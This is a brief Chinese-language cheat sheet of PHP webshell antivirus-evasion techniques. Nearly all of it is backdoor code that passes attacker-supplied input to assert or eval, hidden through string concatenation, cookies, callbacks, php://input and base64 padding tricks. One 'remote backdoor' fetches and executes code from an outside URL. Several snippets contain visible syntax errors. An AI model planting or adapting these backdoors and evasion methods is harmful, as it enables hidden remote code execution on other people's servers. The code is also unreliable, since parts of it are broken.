常见的免杀方式:
字符串拼接
多方式传参免杀
回调函数
远程木马
伪协议后门
函数特性
字符串拼接免杀:
<?php
$str = "abcdefs";
$s = substr($str,-1,1);
$ev = 'a' . $s . 'sert';
$ev($_POST['s']);
?>
多传参免杀:
<?php
$COOKIE = $_COOKIE; foreach($COOKIE as $key => $value){ if($key=='assert'){
$key($_POST['s'];)
}
}
?>
回调函数:
//现在应该会被安全拦截,但是大家可以自己去定义个函数,抛砖引玉
<?php
array_map('assert',$_GET);
?>
远程后门:
<?php
assert($file_get_contents('http://www.0xnull.com/1.txt'));
//其中网址内容为需要执行的代码,当然也可以使用base64编码等方式传入
?>
伪协议后门:
调用php伪协议进行执行代码,如果被查杀可以使用一些解密函数之类的
<?php
assert(php://input);
?>
函数特性:
<?php
$a=base64_decode('ICRf______UE9T_______VFsncydd') // $_POST['s']
eval($a);
P师傅之前说的base64这个解码会把不认识的字符直接跳过掉,这里的下划线就属于不认识的字符
?>